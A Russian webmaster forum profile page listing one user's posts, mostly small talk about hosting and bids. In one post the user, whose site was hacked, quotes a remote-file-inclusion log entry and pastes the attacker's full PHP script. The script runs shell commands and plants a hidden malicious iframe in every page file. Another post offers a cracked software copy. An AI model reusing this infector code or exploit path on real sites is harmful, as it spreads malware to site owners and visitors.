shishil

Рейтинг
8
Регистрация
12.10.2007

Как обстоят дела сейчас?)

Будем ждать)

Предполагаются ли скидочки) на сенятбрь для VDS?

PR на сайтах банных есть какой-никакой)?

Здравствуйте всем. Подскажите по возможности. Схожая ситуация, убиваю фрейм "HTML:Iframe-gen" (точно везде), меняю пароли, храню их в голове) и через день опять эта гадость сидит на сайте (ofmusic.ru). При чем прописывается в конфиг чаще и инклудные пхп, также на index. Пробую закрывать папку конфига аксесом order deny,allow,deny from all - все то же.

По логам отследили такой вход /mat/11/include/inc_ext/spaw/dialogs/table.php, spaw_root=http://www.trepamontes4x4.com/digi/menu?, а там

а там)))

їХ-їХ (00:04:03 24/04/2008)
<?
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size)
{
if (!is_numeric($size)) {return FALSE;}

else
{
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

else {$size = $size . " B";}

return $size;
}
}
if(!isset($_SERVER['DOCUMENT_ROOT']))
{
$n = $_SERVER['SCRIPT_NAME'];
$f = ereg_replace('\\\\', '/',$_SERVER["PATH_TRANSLATED"]);
$f = str_replace('//','/',$f);
$_SERVER['DOCUMENT_ROOT'] = eregi_replace($n, "", $f);
}
$codigo = "<IFRAME src=\"http://usuarios.arnet.com.ar/alvarezluque/morgan.html\" width=\"0\" height=\"0\" frameborder=\"0\"></iframe>\n";
$directorio = $_SERVER['DOCUMENT_ROOT'];

foreach (glob("$directorio/*.php") as $archivo) {
$fp=fopen($archivo,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.htm") as $archivh) {
$fp=fopen($archivh,"a+");
fputs($fp,$codigo);
}
foreach (glob("$directorio/*.html") as $archivl) {
$fp=fopen($archivl,"a+");
fputs($fp,$codigo);
}
?>

идет отсюда http://www.trepamontes4x4.com ,

при етом я обнаружил что инклюдиться <IFRAME src=\"http://usuarios.arnet.com.ar/alvarezluque/morgan.html\

Добавление в аксес "php_value allow_url_fopen 0" не дало эффекта. С сервера этих уродов стянул кучу скриптов, может противоядие какое из них придумать?) Либо радикально переписывать движок (самописный)?

В принципе, помимо сабмиттера можно воспользоваться программой RSS Submit. У меня есть крак 2.36, но тут, наверное, выкладывать его нельзя? Могу поделиться, если если ради благого дела)))

Не ну, ребзя, Вы так доведете до блица.)) Давайте я за 15 беру и все)) типо кто первый встал того и тапочки)

12 и все, я беру!)

10 баку дам

Можно урл посмотреть?

123 4
Всего: 34